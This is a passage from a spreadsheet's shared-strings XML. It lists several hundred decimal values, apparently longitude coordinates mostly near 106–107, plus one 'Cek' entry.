  </si>
  <si>
    <t>110.50670</t>
  </si>
  <si>
    <t>106.87208</t>
  </si>
  <si>
    <t>107.67473</t>
  </si>
  <si>
    <t>107.66007</t>
  </si>
  <si>
    <t>106.81951</t>
  </si>
  <si>
    <t>106.79589</t>
  </si>
  <si>
    <t>106.79614</t>
  </si>
  <si>
    <t>106.76267</t>
  </si>
  <si>
    <t>106.79349</t>
  </si>
  <si>
    <t>106.78732</t>
  </si>
  <si>
    <t>106.81480</t>
  </si>
  <si>
    <t>106.78640</t>
  </si>
  <si>
    <t>106.77686</t>
  </si>
  <si>
    <t>106.76919</t>
  </si>
  <si>
    <t>106.79170</t>
  </si>
  <si>
    <t>106.91110</t>
  </si>
  <si>
    <t>112.76496</t>
  </si>
  <si>
    <t>106.77516</t>
  </si>
  <si>
    <t>106.87558</t>
  </si>
  <si>
    <t>106.88588</t>
  </si>
  <si>
    <t>106.86045</t>
  </si>
  <si>
    <t>106.82500</t>
  </si>
  <si>
    <t>106.89415</t>
  </si>
  <si>
    <t>106.85179</t>
  </si>
  <si>
    <t>106.89028</t>
  </si>
  <si>
    <t>106.86069</t>
  </si>
  <si>
    <t>106.85931</t>
  </si>
  <si>
    <t>106.91772</t>
  </si>
  <si>
    <t>106.88780</t>
  </si>
  <si>
    <t>106.71824</t>
  </si>
  <si>
    <t>106.88693</t>
  </si>
  <si>
    <t>106.89536</t>
  </si>
  <si>
    <t>106.84315</t>
  </si>
  <si>
    <t>106.74779</t>
  </si>
  <si>
    <t>106.87588</t>
  </si>
  <si>
    <t>106.87535</t>
  </si>
  <si>
    <t>106.85238</t>
  </si>
  <si>
    <t>106.85675</t>
  </si>
  <si>
    <t>106.82473</t>
  </si>
  <si>
    <t>106.86208</t>
  </si>
  <si>
    <t>106.85173</t>
  </si>
  <si>
    <t>106.86782</t>
  </si>
  <si>
    <t>106.73927</t>
  </si>
  <si>
    <t>106.90159</t>
  </si>
  <si>
    <t>106.78684</t>
  </si>
  <si>
    <t>106.80445</t>
  </si>
  <si>
    <t>106.71239</t>
  </si>
  <si>
    <t>106.70858</t>
  </si>
  <si>
    <t>106.87796</t>
  </si>
  <si>
    <t>106.86535</t>
  </si>
  <si>
    <t>106.90598</t>
  </si>
  <si>
    <t>106.76936</t>
  </si>
  <si>
    <t>106.87632</t>
  </si>
  <si>
    <t>106.87792</t>
  </si>
  <si>
    <t>106.68422</t>
  </si>
  <si>
    <t>107.62560</t>
  </si>
  <si>
    <t>106.87788</t>
  </si>
  <si>
    <t>106.91129</t>
  </si>
  <si>
    <t>106.68952</t>
  </si>
  <si>
    <t>106.91096</t>
  </si>
  <si>
    <t>106.71121</t>
  </si>
  <si>
    <t>106.89728</t>
  </si>
  <si>
    <t>106.81963</t>
  </si>
  <si>
    <t>106.72427</t>
  </si>
  <si>
    <t>106.87165</t>
  </si>
  <si>
    <t>106.85863</t>
  </si>
  <si>
    <t>106.69835</t>
  </si>
  <si>
    <t>107.62118</t>
  </si>
  <si>
    <t>106.91031</t>
  </si>
  <si>
    <t>106.82996</t>
  </si>
  <si>
    <t>107.79766</t>
  </si>
  <si>
    <t>107.70435</t>
  </si>
  <si>
    <t>107.68683</t>
  </si>
  <si>
    <t>107.62060</t>
  </si>
  <si>
    <t>106.73045</t>
  </si>
  <si>
    <t>106.72917</t>
  </si>
  <si>
    <t>106.85453</t>
  </si>
  <si>
    <t>106.79763</t>
  </si>
  <si>
    <t>106.73951</t>
  </si>
  <si>
    <t>107.62304</t>
  </si>
  <si>
    <t>106.78792</t>
  </si>
  <si>
    <t>106.74467</t>
  </si>
  <si>
    <t>106.75160</t>
  </si>
  <si>
    <t>107.68602</t>
  </si>
  <si>
    <t>106.94399</t>
  </si>
  <si>
    <t>110.37442</t>
  </si>
  <si>
    <t>107.69256</t>
  </si>
  <si>
    <t>107.82043</t>
  </si>
  <si>
    <t>106.83363</t>
  </si>
  <si>
    <t>106.83437</t>
  </si>
  <si>
    <t>106.82209</t>
  </si>
  <si>
    <t>112.70527</t>
  </si>
  <si>
    <t>112.73441</t>
  </si>
  <si>
    <t>112.73327</t>
  </si>
  <si>
    <t>107.61932</t>
  </si>
  <si>
    <t>112.75720</t>
  </si>
  <si>
    <t>110.21899</t>
  </si>
  <si>
    <t>112.74580</t>
  </si>
  <si>
    <t>112.73919</t>
  </si>
  <si>
    <t>112.75734</t>
  </si>
  <si>
    <t>112.75087</t>
  </si>
  <si>
    <t>112.73559</t>
  </si>
  <si>
    <t>112.72221</t>
  </si>
  <si>
    <t>112.73031</t>
  </si>
  <si>
    <t>112.74495</t>
  </si>
  <si>
    <t>112.69603</t>
  </si>
  <si>
    <t>112.75579</t>
  </si>
  <si>
    <t>112.73325</t>
  </si>
  <si>
    <t>112.76004</t>
  </si>
  <si>
    <t>112.73603</t>
  </si>
  <si>
    <t>112.72685</t>
  </si>
  <si>
    <t>112.73672</t>
  </si>
  <si>
    <t>106.74222</t>
  </si>
  <si>
    <t>106.68544</t>
  </si>
  <si>
    <t>112.71060</t>
  </si>
  <si>
    <t>106.63834</t>
  </si>
  <si>
    <t>112.70146</t>
  </si>
  <si>
    <t>112.75210</t>
  </si>
  <si>
    <t>106.71176</t>
  </si>
  <si>
    <t>111.55546</t>
  </si>
  <si>
    <t>111.55335</t>
  </si>
  <si>
    <t>106.86036</t>
  </si>
  <si>
    <t>106.87009</t>
  </si>
  <si>
    <t>106.86119</t>
  </si>
  <si>
    <t>107.10229</t>
  </si>
  <si>
    <t>106.78288</t>
  </si>
  <si>
    <t>106.86438</t>
  </si>
  <si>
    <t>106.88281</t>
  </si>
  <si>
    <t>106.74968</t>
  </si>
  <si>
    <t>106.76623</t>
  </si>
  <si>
    <t>106.83532</t>
  </si>
  <si>
    <t>106.82924</t>
  </si>
  <si>
    <t>106.77217</t>
  </si>
  <si>
    <t>106.77740</t>
  </si>
  <si>
    <t>106.76694</t>
  </si>
  <si>
    <t>111.01084</t>
  </si>
  <si>
    <t>106.90788</t>
  </si>
  <si>
    <t>106.74689</t>
  </si>
  <si>
    <t>112.72022</t>
  </si>
  <si>
    <t>112.70163</t>
  </si>
  <si>
    <t>105.76244</t>
  </si>
  <si>
    <t>106.71184</t>
  </si>
  <si>
    <t>106.52679</t>
  </si>
  <si>
    <t>106.62721</t>
  </si>
  <si>
    <t>107.08222</t>
  </si>
  <si>
    <t>106.58811</t>
  </si>
  <si>
    <t>106.90942</t>
  </si>
  <si>
    <t>106.91180</t>
  </si>
  <si>
    <t>110.30955</t>
  </si>
  <si>
    <t>107.77958</t>
  </si>
  <si>
    <t>106.76880</t>
  </si>
  <si>
    <t>112.73586</t>
  </si>
  <si>
    <t>106.81906</t>
  </si>
  <si>
    <t>106.79880</t>
  </si>
  <si>
    <t>116.08885</t>
  </si>
  <si>
    <t>106.86871</t>
  </si>
  <si>
    <t>107.76791</t>
  </si>
  <si>
    <t>107.75306</t>
  </si>
  <si>
    <t>107.75524</t>
  </si>
  <si>
    <t>107.73146</t>
  </si>
  <si>
    <t>107.76725</t>
  </si>
  <si>
    <t>106.86134</t>
  </si>
  <si>
    <t>106.96801</t>
  </si>
  <si>
    <t>107.01143</t>
  </si>
  <si>
    <t>106.77482</t>
  </si>
  <si>
    <t>106.90453</t>
  </si>
  <si>
    <t>106.87858</t>
  </si>
  <si>
    <t>106.86440</t>
  </si>
  <si>
    <t>107.01805</t>
  </si>
  <si>
    <t>106.87128</t>
  </si>
  <si>
    <t>106.79384</t>
  </si>
  <si>
    <t>106.86228</t>
  </si>
  <si>
    <t>106.85706</t>
  </si>
  <si>
    <t>106.86387</t>
  </si>
  <si>
    <t>106.83541</t>
  </si>
  <si>
    <t>106.87717</t>
  </si>
  <si>
    <t>106.82655</t>
  </si>
  <si>
    <t>106.92522</t>
  </si>
  <si>
    <t>106.84805</t>
  </si>
  <si>
    <t>106.87634</t>
  </si>
  <si>
    <t>106.97641</t>
  </si>
  <si>
    <t>106.95356</t>
  </si>
  <si>
    <t>106.89308</t>
  </si>
  <si>
    <t>106.90165</t>
  </si>
  <si>
    <t>106.95032</t>
  </si>
  <si>
    <t>106.83275</t>
  </si>
  <si>
    <t>106.86476</t>
  </si>
  <si>
    <t>106.87737</t>
  </si>
  <si>
    <t>106.78473</t>
  </si>
  <si>
    <t>106.92729</t>
  </si>
  <si>
    <t>106.88570</t>
  </si>
  <si>
    <t>106.90473</t>
  </si>
  <si>
    <t>106.95083</t>
  </si>
  <si>
    <t>106.86676</t>
  </si>
  <si>
    <t>106.90322</t>
  </si>
  <si>
    <t>106.92349</t>
  </si>
  <si>
    <t>106.98917</t>
  </si>
  <si>
    <t>106.88408</t>
  </si>
  <si>
    <t>106.84680</t>
  </si>
  <si>
    <t>106.88209</t>
  </si>
  <si>
    <t>106.92673</t>
  </si>
  <si>
    <t>106.86080</t>
  </si>
  <si>
    <t>106.86469</t>
  </si>
  <si>
    <t>106.80992</t>
  </si>
  <si>
    <t>106.92940</t>
  </si>
  <si>
    <t>106.65004</t>
  </si>
  <si>
    <t>106.87017</t>
  </si>
  <si>
    <t>106.87423</t>
  </si>
  <si>
    <t>106.86662</t>
  </si>
  <si>
    <t>106.86678</t>
  </si>
  <si>
    <t>106.91162</t>
  </si>
  <si>
    <t>106.91157</t>
  </si>
  <si>
    <t>106.88800</t>
  </si>
  <si>
    <t>106.91041</t>
  </si>
  <si>
    <t>106.87121</t>
  </si>
  <si>
    <t>106.88617</t>
  </si>
  <si>
    <t>106.96229</t>
  </si>
  <si>
    <t>106.88440</t>
  </si>
  <si>
    <t>106.92176</t>
  </si>
  <si>
    <t>106.90721</t>
  </si>
  <si>
    <t>106.77685</t>
  </si>
  <si>
    <t>106.92803</t>
  </si>
  <si>
    <t>106.86677</t>
  </si>
  <si>
    <t>106.91322</t>
  </si>
  <si>
    <t>106.92403</t>
  </si>
  <si>
    <t>106.88248</t>
  </si>
  <si>
    <t>106.89596</t>
  </si>
  <si>
    <t>106.89694</t>
  </si>
  <si>
    <t>106.81349</t>
  </si>
  <si>
    <t>106.89847</t>
  </si>
  <si>
    <t>106.89372</t>
  </si>
  <si>
    <t>106.86173</t>
  </si>
  <si>
    <t>106.90916</t>
  </si>
  <si>
    <t>106.91079</t>
  </si>
  <si>
    <t>106.92392</t>
  </si>
  <si>
    <t>106.90676</t>
  </si>
  <si>
    <t>106.89885</t>
  </si>
  <si>
    <t>106.91015</t>
  </si>
  <si>
    <t>106.98956</t>
  </si>
  <si>
    <t>106.90814</t>
  </si>
  <si>
    <t>106.90367</t>
  </si>
  <si>
    <t>106.97003</t>
  </si>
  <si>
    <t>106.90724</t>
  </si>
  <si>
    <t>106.94786</t>
  </si>
  <si>
    <t>106.88601</t>
  </si>
  <si>
    <t>106.83225</t>
  </si>
  <si>
    <t>106.88142</t>
  </si>
  <si>
    <t>106.96938</t>
  </si>
  <si>
    <t>106.90329</t>
  </si>
  <si>
    <t>106.81385</t>
  </si>
  <si>
    <t>106.91853</t>
  </si>
  <si>
    <t>106.85956</t>
  </si>
  <si>
    <t>107.04727</t>
  </si>
  <si>
    <t>106.90780</t>
  </si>
  <si>
    <t>106.81119</t>
  </si>
  <si>
    <t>106.88980</t>
  </si>
  <si>
    <t>106.80597</t>
  </si>
  <si>
    <t>106.87889</t>
  </si>
  <si>
    <t>106.90071</t>
  </si>
  <si>
    <t>106.89180</t>
  </si>
  <si>
    <t>106.81895</t>
  </si>
  <si>
    <t>106.77638</t>
  </si>
  <si>
    <t>107.79183</t>
  </si>
  <si>
    <t>106.87562</t>
  </si>
  <si>
    <t>106.88476</t>
  </si>
  <si>
    <t>106.76227</t>
  </si>
  <si>
    <t>106.88262</t>
  </si>
  <si>
    <t>106.92300</t>
  </si>
  <si>
    <t>106.86284</t>
  </si>
  <si>
    <t>106.92117</t>
  </si>
  <si>
    <t>106.89246</t>
  </si>
  <si>
    <t>106.89732</t>
  </si>
  <si>
    <t>106.91021</t>
  </si>
  <si>
    <t>107.78901</t>
  </si>
  <si>
    <t>106.85054</t>
  </si>
  <si>
    <t>106.91193</t>
  </si>
  <si>
    <t>106.79874</t>
  </si>
  <si>
    <t>106.78769</t>
  </si>
  <si>
    <t>110.19974</t>
  </si>
  <si>
    <t>110.32368</t>
  </si>
  <si>
    <t>111.55689</t>
  </si>
  <si>
    <t>106.94078</t>
  </si>
  <si>
    <t>112.79820</t>
  </si>
  <si>
    <t>106.84050</t>
  </si>
  <si>
    <t>108.77457</t>
  </si>
  <si>
    <t>106.82712</t>
  </si>
  <si>
    <t>111.03058</t>
  </si>
  <si>
    <t>107.62508</t>
  </si>
  <si>
    <t>106.89384</t>
  </si>
  <si>
    <t>106.89370</t>
  </si>
  <si>
    <t>106.72591</t>
  </si>
  <si>
    <t>106.93105</t>
  </si>
  <si>
    <t>106.70778</t>
  </si>
  <si>
    <t>106.81190</t>
  </si>
  <si>
    <t>106.73840</t>
  </si>
  <si>
    <t>106.95104</t>
  </si>
  <si>
    <t>106.70008</t>
  </si>
  <si>
    <t>106.87637</t>
  </si>
  <si>
    <t>106.91517</t>
  </si>
  <si>
    <t>106.78825</t>
  </si>
  <si>
    <t>106.74053</t>
  </si>
  <si>
    <t>106.71404</t>
  </si>
  <si>
    <t>106.71392</t>
  </si>
  <si>
    <t>106.95192</t>
  </si>
  <si>
    <t>106.87649</t>
  </si>
  <si>
    <t>106.79676</t>
  </si>
  <si>
    <t>106.87840</t>
  </si>
  <si>
    <t>106.83902</t>
  </si>
  <si>
    <t>106.83089</t>
  </si>
  <si>
    <t>106.87569</t>
  </si>
  <si>
    <t>106.91028</t>
  </si>
  <si>
    <t>106.81233</t>
  </si>
  <si>
    <t>106.87161</t>
  </si>
  <si>
    <t>106.90444</t>
  </si>
  <si>
    <t>106.87771</t>
  </si>
  <si>
    <t>106.88753</t>
  </si>
  <si>
    <t>106.85564</t>
  </si>
  <si>
    <t>106.83377</t>
  </si>
  <si>
    <t>106.88834</t>
  </si>
  <si>
    <t>106.78580</t>
  </si>
  <si>
    <t>106.88054</t>
  </si>
  <si>
    <t>106.85565</t>
  </si>
  <si>
    <t>106.89391</t>
  </si>
  <si>
    <t>106.89909</t>
  </si>
  <si>
    <t>106.92374</t>
  </si>
  <si>
    <t>106.71055</t>
  </si>
  <si>
    <t>106.87585</t>
  </si>
  <si>
    <t>106.80438</t>
  </si>
  <si>
    <t>106.80441</t>
  </si>
  <si>
    <t>106.74592</t>
  </si>
  <si>
    <t>106.84426</t>
  </si>
  <si>
    <t>106.82240</t>
  </si>
  <si>
    <t>106.76877</t>
  </si>
  <si>
    <t>106.87175</t>
  </si>
  <si>
    <t>106.78984</t>
  </si>
  <si>
    <t>106.87328</t>
  </si>
  <si>
    <t>106.71766</t>
  </si>
  <si>
    <t>106.78812</t>
  </si>
  <si>
    <t>106.87338</t>
  </si>
  <si>
    <t>106.93478</t>
  </si>
  <si>
    <t>106.81863</t>
  </si>
  <si>
    <t>106.71908</t>
  </si>
  <si>
    <t>106.85569</t>
  </si>
  <si>
    <t>107.03711</t>
  </si>
  <si>
    <t>106.88143</t>
  </si>
  <si>
    <t>106.82462</t>
  </si>
  <si>
    <t>106.80583</t>
  </si>
  <si>
    <t>106.91090</t>
  </si>
  <si>
    <t>106.87841</t>
  </si>
  <si>
    <t>106.91950</t>
  </si>
  <si>
    <t>106.88835</t>
  </si>
  <si>
    <t>106.83360</t>
  </si>
  <si>
    <t>106.81822</t>
  </si>
  <si>
    <t>106.93025</t>
  </si>
  <si>
    <t>106.83286</t>
  </si>
  <si>
    <t>106.93790</t>
  </si>
  <si>
    <t>106.92334</t>
  </si>
  <si>
    <t>106.69933</t>
  </si>
  <si>
    <t>106.88112</t>
  </si>
  <si>
    <t>106.86028</t>
  </si>
  <si>
    <t>106.90446</t>
  </si>
  <si>
    <t>106.95252</t>
  </si>
  <si>
    <t>106.79913</t>
  </si>
  <si>
    <t>106.87236</t>
  </si>
  <si>
    <t>106.94335</t>
  </si>
  <si>
    <t>106.92181</t>
  </si>
  <si>
    <t>106.90810</t>
  </si>
  <si>
    <t>106.75293</t>
  </si>
  <si>
    <t>106.87322</t>
  </si>
  <si>
    <t>106.95043</t>
  </si>
  <si>
    <t>106.79915</t>
  </si>
  <si>
    <t>106.86551</t>
  </si>
  <si>
    <t>106.92936</t>
  </si>
  <si>
    <t>106.75696</t>
  </si>
  <si>
    <t>106.88027</t>
  </si>
  <si>
    <t>106.85985</t>
  </si>
  <si>
    <t>106.99215</t>
  </si>
  <si>
    <t>106.89375</t>
  </si>
  <si>
    <t>106.88896</t>
  </si>
  <si>
    <t>106.88195</t>
  </si>
  <si>
    <t>106.89644</t>
  </si>
  <si>
    <t>106.93919</t>
  </si>
  <si>
    <t>106.88947</t>
  </si>
  <si>
    <t>106.83842</t>
  </si>
  <si>
    <t>106.95105</t>
  </si>
  <si>
    <t>106.86005</t>
  </si>
  <si>
    <t>106.93715</t>
  </si>
  <si>
    <t>107.11089</t>
  </si>
  <si>
    <t>107.77668</t>
  </si>
  <si>
    <t>107.57309</t>
  </si>
  <si>
    <t>107.66386</t>
  </si>
  <si>
    <t>106.85817</t>
  </si>
  <si>
    <t>106.84998</t>
  </si>
  <si>
    <t>110.66711</t>
  </si>
  <si>
    <t>107.01201</t>
  </si>
  <si>
    <t>107.00857</t>
  </si>
  <si>
    <t>111.10174</t>
  </si>
  <si>
    <t>110.46051</t>
  </si>
  <si>
    <t>110.39903</t>
  </si>
  <si>
    <t>110.45962</t>
  </si>
  <si>
    <t>110.45452</t>
  </si>
  <si>
    <t>106.82611</t>
  </si>
  <si>
    <t>106.80180</t>
  </si>
  <si>
    <t>104.13867</t>
  </si>
  <si>
    <t>112.79714</t>
  </si>
  <si>
    <t>106.82608</t>
  </si>
  <si>
    <t>106.97944</t>
  </si>
  <si>
    <t>106.98954</t>
  </si>
  <si>
    <t>106.95052</t>
  </si>
  <si>
    <t>106.92134</t>
  </si>
  <si>
    <t>106.98771</t>
  </si>
  <si>
    <t>106.95653</t>
  </si>
  <si>
    <t>106.94975</t>
  </si>
  <si>
    <t>106.85447</t>
  </si>
  <si>
    <t>106.92728</t>
  </si>
  <si>
    <t>106.98729</t>
  </si>
  <si>
    <t>106.97881</t>
  </si>
  <si>
    <t>106.83380</t>
  </si>
  <si>
    <t>106.84989</t>
  </si>
  <si>
    <t>106.95075</t>
  </si>
  <si>
    <t>106.98828</t>
  </si>
  <si>
    <t>106.90690</t>
  </si>
  <si>
    <t>106.95065</t>
  </si>
  <si>
    <t>106.96272</t>
  </si>
  <si>
    <t>106.89614</t>
  </si>
  <si>
    <t>106.85548</t>
  </si>
  <si>
    <t>106.84421</t>
  </si>
  <si>
    <t>106.86637</t>
  </si>
  <si>
    <t>106.86467</t>
  </si>
  <si>
    <t>106.86645</t>
  </si>
  <si>
    <t>106.87598</t>
  </si>
  <si>
    <t>106.88629</t>
  </si>
  <si>
    <t>106.87495</t>
  </si>
  <si>
    <t>106.88514</t>
  </si>
  <si>
    <t>106.94763</t>
  </si>
  <si>
    <t>106.85141</t>
  </si>
  <si>
    <t>107.02389</t>
  </si>
  <si>
    <t>106.62237</t>
  </si>
  <si>
    <t>106.87581</t>
  </si>
  <si>
    <t>107.00840</t>
  </si>
  <si>
    <t>106.97890</t>
  </si>
  <si>
    <t>106.85416</t>
  </si>
  <si>
    <t>106.85779</t>
  </si>
  <si>
    <t>106.89322</t>
  </si>
  <si>
    <t>106.87997</t>
  </si>
  <si>
    <t>106.99320</t>
  </si>
  <si>
    <t>106.85647</t>
  </si>
  <si>
    <t>106.85967</t>
  </si>
  <si>
    <t>107.01720</t>
  </si>
  <si>
    <t>106.90669</t>
  </si>
  <si>
    <t>106.85825</t>
  </si>
  <si>
    <t>106.90328</t>
  </si>
  <si>
    <t>106.85286</t>
  </si>
  <si>
    <t>106.99066</t>
  </si>
  <si>
    <t>106.87498</t>
  </si>
  <si>
    <t>106.90460</t>
  </si>
  <si>
    <t>106.86631</t>
  </si>
  <si>
    <t>106.86553</t>
  </si>
  <si>
    <t>106.98060</t>
  </si>
  <si>
    <t>106.84389</t>
  </si>
  <si>
    <t>106.89388</t>
  </si>
  <si>
    <t>106.84790</t>
  </si>
  <si>
    <t>106.90845</t>
  </si>
  <si>
    <t>106.90431</t>
  </si>
  <si>
    <t>106.87682</t>
  </si>
  <si>
    <t>106.90349</t>
  </si>
  <si>
    <t>106.88249</t>
  </si>
  <si>
    <t>106.89382</t>
  </si>
  <si>
    <t>106.82184</t>
  </si>
  <si>
    <t>106.94928</t>
  </si>
  <si>
    <t>106.85345</t>
  </si>
  <si>
    <t>106.89600</t>
  </si>
  <si>
    <t>106.86990</t>
  </si>
  <si>
    <t>106.81202</t>
  </si>
  <si>
    <t>106.86985</t>
  </si>
  <si>
    <t>106.87422</t>
  </si>
  <si>
    <t>106.90292</t>
  </si>
  <si>
    <t>106.86920</t>
  </si>
  <si>
    <t>106.89654</t>
  </si>
  <si>
    <t>106.89622</t>
  </si>
  <si>
    <t>106.87684</t>
  </si>
  <si>
    <t>106.83408</t>
  </si>
  <si>
    <t>106.86057</t>
  </si>
  <si>
    <t>106.94659</t>
  </si>
  <si>
    <t>106.98971</t>
  </si>
  <si>
    <t>106.83283</t>
  </si>
  <si>
    <t>106.85760</t>
  </si>
  <si>
    <t>106.87077</t>
  </si>
  <si>
    <t>107.00609</t>
  </si>
  <si>
    <t>106.88021</t>
  </si>
  <si>
    <t>106.99239</t>
  </si>
  <si>
    <t>106.80596</t>
  </si>
  <si>
    <t>106.99085</t>
  </si>
  <si>
    <t>106.87444</t>
  </si>
  <si>
    <t>106.86195</t>
  </si>
  <si>
    <t>106.89903</t>
  </si>
  <si>
    <t>106.91126</t>
  </si>
  <si>
    <t>106.90909</t>
  </si>
  <si>
    <t>106.84792</t>
  </si>
  <si>
    <t>106.88378</t>
  </si>
  <si>
    <t>106.95042</t>
  </si>
  <si>
    <t>106.90282</t>
  </si>
  <si>
    <t>106.90369</t>
  </si>
  <si>
    <t>106.88315</t>
  </si>
  <si>
    <t>106.86534</t>
  </si>
  <si>
    <t>106.96278</t>
  </si>
  <si>
    <t>106.89309</t>
  </si>
  <si>
    <t>106.89509</t>
  </si>
  <si>
    <t>106.92234</t>
  </si>
  <si>
    <t>106.92276</t>
  </si>
  <si>
    <t>106.94880</t>
  </si>
  <si>
    <t>106.98787</t>
  </si>
  <si>
    <t>106.88949</t>
  </si>
  <si>
    <t>106.95137</t>
  </si>
  <si>
    <t>106.91612</t>
  </si>
  <si>
    <t>107.00331</t>
  </si>
  <si>
    <t>106.90199</t>
  </si>
  <si>
    <t>106.84266</t>
  </si>
  <si>
    <t>106.87140</t>
  </si>
  <si>
    <t>106.96040</t>
  </si>
  <si>
    <t>106.87067</t>
  </si>
  <si>
    <t>106.90873</t>
  </si>
  <si>
    <t>106.97922</t>
  </si>
  <si>
    <t>106.93596</t>
  </si>
  <si>
    <t>106.88412</t>
  </si>
  <si>
    <t>106.90659</t>
  </si>
  <si>
    <t>106.95378</t>
  </si>
  <si>
    <t>106.98677</t>
  </si>
  <si>
    <t>106.90226</t>
  </si>
  <si>
    <t>106.90207</t>
  </si>
  <si>
    <t>106.90989</t>
  </si>
  <si>
    <t>107.02928</t>
  </si>
  <si>
    <t>106.95085</t>
  </si>
  <si>
    <t>106.85214</t>
  </si>
  <si>
    <t>106.81107</t>
  </si>
  <si>
    <t>106.90240</t>
  </si>
  <si>
    <t>106.86202</t>
  </si>
  <si>
    <t>106.84974</t>
  </si>
  <si>
    <t>106.82839</t>
  </si>
  <si>
    <t>106.88993</t>
  </si>
  <si>
    <t>106.96887</t>
  </si>
  <si>
    <t>106.88050</t>
  </si>
  <si>
    <t>106.99534</t>
  </si>
  <si>
    <t>106.98529</t>
  </si>
  <si>
    <t>106.97943</t>
  </si>
  <si>
    <t>106.85459</t>
  </si>
  <si>
    <t>106.96903</t>
  </si>
  <si>
    <t>106.92594</t>
  </si>
  <si>
    <t>106.91905</t>
  </si>
  <si>
    <t>106.89872</t>
  </si>
  <si>
    <t>106.90864</t>
  </si>
  <si>
    <t>106.89043</t>
  </si>
  <si>
    <t>106.89713</t>
  </si>
  <si>
    <t>106.84222</t>
  </si>
  <si>
    <t>106.95880</t>
  </si>
  <si>
    <t>106.99574</t>
  </si>
  <si>
    <t>106.87770</t>
  </si>
  <si>
    <t>107.00278</t>
  </si>
  <si>
    <t>106.87844</t>
  </si>
  <si>
    <t>106.87578</t>
  </si>
  <si>
    <t>106.94933</t>
  </si>
  <si>
    <t>106.94625</t>
  </si>
  <si>
    <t>106.84447</t>
  </si>
  <si>
    <t>107.02586</t>
  </si>
  <si>
    <t>106.94571</t>
  </si>
  <si>
    <t>106.92182</t>
  </si>
  <si>
    <t>106.92016</t>
  </si>
  <si>
    <t>106.90678</t>
  </si>
  <si>
    <t>106.86992</t>
  </si>
  <si>
    <t>106.91111</t>
  </si>
  <si>
    <t>106.94749</t>
  </si>
  <si>
    <t>106.85527</t>
  </si>
  <si>
    <t>106.86215</t>
  </si>
  <si>
    <t>106.87027</t>
  </si>
  <si>
    <t>106.91918</t>
  </si>
  <si>
    <t>106.90285</t>
  </si>
  <si>
    <t>106.77813</t>
  </si>
  <si>
    <t>106.77639</t>
  </si>
  <si>
    <t>106.96434</t>
  </si>
  <si>
    <t>106.95632</t>
  </si>
  <si>
    <t>106.98541</t>
  </si>
  <si>
    <t>106.89901</t>
  </si>
  <si>
    <t>106.87790</t>
  </si>
  <si>
    <t>106.87070</t>
  </si>
  <si>
    <t>106.90156</t>
  </si>
  <si>
    <t>106.85619</t>
  </si>
  <si>
    <t>106.86620</t>
  </si>
  <si>
    <t>106.88912</t>
  </si>
  <si>
    <t>106.95018</t>
  </si>
  <si>
    <t>106.88131</t>
  </si>
  <si>
    <t>106.90123</t>
  </si>
  <si>
    <t>106.92550</t>
  </si>
  <si>
    <t>106.93864</t>
  </si>
  <si>
    <t>106.91042</t>
  </si>
  <si>
    <t>106.85598</t>
  </si>
  <si>
    <t>106.94011</t>
  </si>
  <si>
    <t>106.88311</t>
  </si>
  <si>
    <t>106.90434</t>
  </si>
  <si>
    <t>106.86570</t>
  </si>
  <si>
    <t>106.82748</t>
  </si>
  <si>
    <t>106.88060</t>
  </si>
  <si>
    <t>106.87847</t>
  </si>
  <si>
    <t>106.90467</t>
  </si>
  <si>
    <t>106.91302</t>
  </si>
  <si>
    <t>106.90365</t>
  </si>
  <si>
    <t>106.91348</t>
  </si>
  <si>
    <t>106.88006</t>
  </si>
  <si>
    <t>106.94165</t>
  </si>
  <si>
    <t>106.93077</t>
  </si>
  <si>
    <t>106.90118</t>
  </si>
  <si>
    <t>106.98080</t>
  </si>
  <si>
    <t>106.90590</t>
  </si>
  <si>
    <t>106.94779</t>
  </si>
  <si>
    <t>106.89394</t>
  </si>
  <si>
    <t>106.94058</t>
  </si>
  <si>
    <t>106.88496</t>
  </si>
  <si>
    <t>106.86923</t>
  </si>
  <si>
    <t>106.86907</t>
  </si>
  <si>
    <t>106.87273</t>
  </si>
  <si>
    <t>106.92384</t>
  </si>
  <si>
    <t>106.89961</t>
  </si>
  <si>
    <t>107.00643</t>
  </si>
  <si>
    <t>106.88243</t>
  </si>
  <si>
    <t>106.92469</t>
  </si>
  <si>
    <t>106.92099</t>
  </si>
  <si>
    <t>106.87845</t>
  </si>
  <si>
    <t>106.91045</t>
  </si>
  <si>
    <t>106.87659</t>
  </si>
  <si>
    <t>106.87131</t>
  </si>
  <si>
    <t>106.95949</t>
  </si>
  <si>
    <t>106.92408</t>
  </si>
  <si>
    <t>106.89549</t>
  </si>
  <si>
    <t>106.90358</t>
  </si>
  <si>
    <t>106.93398</t>
  </si>
  <si>
    <t>106.92945</t>
  </si>
  <si>
    <t>106.77634</t>
  </si>
  <si>
    <t>106.99540</t>
  </si>
  <si>
    <t>106.88411</t>
  </si>
  <si>
    <t>106.91588</t>
  </si>
  <si>
    <t>106.89132</t>
  </si>
  <si>
    <t>106.91375</t>
  </si>
  <si>
    <t>106.86986</t>
  </si>
  <si>
    <t>106.90114</t>
  </si>
  <si>
    <t>106.90520</t>
  </si>
  <si>
    <t>106.87089</t>
  </si>
  <si>
    <t>106.95536</t>
  </si>
  <si>
    <t>107.01132</t>
  </si>
  <si>
    <t>106.88394</t>
  </si>
  <si>
    <t>106.86524</t>
  </si>
  <si>
    <t>106.91747</t>
  </si>
  <si>
    <t>106.94894</t>
  </si>
  <si>
    <t>106.87061</t>
  </si>
  <si>
    <t>106.90947</t>
  </si>
  <si>
    <t>106.90141</t>
  </si>
  <si>
    <t>106.83735</t>
  </si>
  <si>
    <t>106.91027</t>
  </si>
  <si>
    <t>106.78720</t>
  </si>
  <si>
    <t>Cek</t>
  </si>
  <si>
    <t>106.92336</t>
  </si>
  <si>
    <t>106.92230</t>
  </si>
  <si>
    <t>106.95323</t>
  </si>
  <si>
    <t>106.51373</t>
  </si>
  <si>
    <t>106.88268</t>
  </si>
  <si>
    <t>106.92544</t>
  </si>
  <si>
    <t>106.90350</t>
  </si>
  <si>
    <t>106.91961</t>
  </si>
  <si>
    <t>106.90518</t>
  </si>
  <si>
    <t>106.94641</t>
  </si>
  <si>
    <t>106.99477</t>
  </si>
  <si>
    <t>106.88526</t>
  </si>
  <si>
    <t>106.93670</t>
  </si>
  <si>
    <t>106.93929</t>
  </si>
  <si>
    <t>106.92571</t>
  </si>
  <si>
    <t>106.87994</t>
  </si>
  <si>
    <t>106.98933</t>
  </si>
  <si>
    <t>106.93912</t>
  </si>
  <si>
    <t>106.88307</t>
  </si>
  <si>
    <t>106.89991</t>
  </si>
  <si>
    <t>106.91863</t>
  </si>
  <si>
    <t>107.16765</t>
  </si>
  <si>
    <t>106.99133</t>
  </si>
  <si>
